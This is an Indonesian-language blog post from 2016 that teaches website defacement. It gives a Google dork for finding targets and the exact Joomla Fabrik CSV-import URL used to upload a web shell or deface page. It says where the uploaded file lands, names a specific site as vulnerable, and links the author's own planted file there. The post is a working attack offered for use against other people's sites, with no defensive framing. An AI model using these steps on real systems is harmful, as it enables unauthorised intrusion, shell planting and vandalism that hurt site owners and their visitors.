Thursday, August 18, 2016
Assalamualaikum .. ^_^
Kali ini saya mau berbagi trik deface / hack jadul . Mungkin bagi para mastah ini trik AMPAS / BASI, tapi bagi saya ini adalah trik bagus untuk memulai perjalanan anda sebagai seorang heker :v .
Sebelumnya sedikit Nasihat dari saya :
"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com
*Site: Boleh diganti apa saja. ( contoh: fr /it /br /za /fi dll )
*Kreasikan Dork Dengan Imajinasi Anda
2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini:
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
contoh: http://sitetarget.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Masukkan shell milik sobat (Pilih File) dan lalu klik tombol import CSV
Note: Jika Gagal Upload Shell , Jangan Bersedih Hati.
Upload saja script deface mu yg ber ekstensi .html
4. Setelah proses upload shell / Script deface mu selesai,
Cara melihat hasil
* Shell http://sitetargetmu.it/media/namafilemu.php
* Script Html http://sitetargetmu.it/media/namafilemu.html
*Site Vuln*
http://www.alphasoft.it/
*File Saya*
http://www.alphasoft.it/media/rosle.html
Wassalamualaikum ....